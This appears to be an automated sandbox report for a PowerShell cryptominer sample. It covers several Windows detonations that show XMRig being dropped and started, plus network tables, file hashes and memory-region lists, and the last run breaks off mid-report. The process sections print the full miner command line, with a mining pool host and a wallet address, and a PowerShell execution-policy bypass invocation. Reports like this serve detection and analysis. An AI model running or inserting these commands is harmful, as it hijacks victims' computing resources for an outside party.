win10v2004-20240508-en
Max time kernel
1800s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4492 wrote to memory of 2500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4492 wrote to memory of 2500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_slugk1da.vyx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:23
Platform
win11-20240508-en
Max time kernel
1798s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5076 wrote to memory of 3028 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5076 wrote to memory of 3028 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tisrlelu.1vk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:35
Platform
win10-20240404-en
Max time kernel
1790s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4412 wrote to memory of 4208 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4412 wrote to memory of 4208 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p15p02t5.ibw.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4208-147-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-148-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-149-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-150-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-151-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-152-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-153-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-154-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-155-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-156-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:35
Platform
win10v2004-20240611-en
Max time kernel
1794s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4888 wrote to memory of 5024 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4888 wrote to memory of 5024 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4304,i,6041070687820623968,3004230300437737550,262144 --variations-seed-version --mojo-platform-channel-handle=3476 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1416,i,6041070687820623968,3004230300437737550,262144 --variations-seed-version --mojo-platform-channel-handle=2284 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 184.28.176.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
memory/4888-0-0x00007FFD92FD3000-0x00007FFD92FD5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dbjbj4do.qsw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4888-10-0x00000214E38C0000-0x00000214E38E2000-memory.dmp
memory/4888-11-0x00007FFD92FD0000-0x00007FFD93A91000-memory.dmp
memory/4888-12-0x00007FFD92FD0000-0x00007FFD93A91000-memory.dmp
memory/4888-14-0x00000214E38F0000-0x00000214E3A3E000-memory.dmp
memory/4888-15-0x00007FFD92FD0000-0x00007FFD93A91000-memory.dmp
memory/4888-17-0x00000214E3C90000-0x00000214E3C9A000-memory.dmp
memory/4888-16-0x00000214E3CA0000-0x00000214E3CB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5024-48-0x00000233D05E0000-0x00000233D0600000-memory.dmp
memory/5024-49-0x00000233D0630000-0x00000233D0650000-memory.dmp
memory/4888-50-0x00000214E38F0000-0x00000214E3A3E000-memory.dmp
memory/5024-51-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/4888-53-0x00007FFD92FD3000-0x00007FFD92FD5000-memory.dmp
memory/5024-55-0x00000233D0670000-0x00000233D0690000-memory.dmp
memory/5024-54-0x00000233D0650000-0x00000233D0670000-memory.dmp
memory/5024-56-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/4888-57-0x00007FFD92FD0000-0x00007FFD93A91000-memory.dmp
memory/4888-60-0x00007FFD92FD0000-0x00007FFD93A91000-memory.dmp
memory/5024-59-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-62-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-63-0x00000233D0650000-0x00000233D0670000-memory.dmp
memory/5024-64-0x00000233D0670000-0x00000233D0690000-memory.dmp
memory/5024-66-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-68-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-70-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-72-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-74-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-76-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-78-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-80-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-82-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-84-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-86-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-88-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-90-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-92-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-94-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-96-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-98-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-100-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-102-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-104-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-106-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-108-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-110-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-112-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-114-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-116-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-118-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:41
Platform
win11-20240419-en
Max time kernel
1798s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
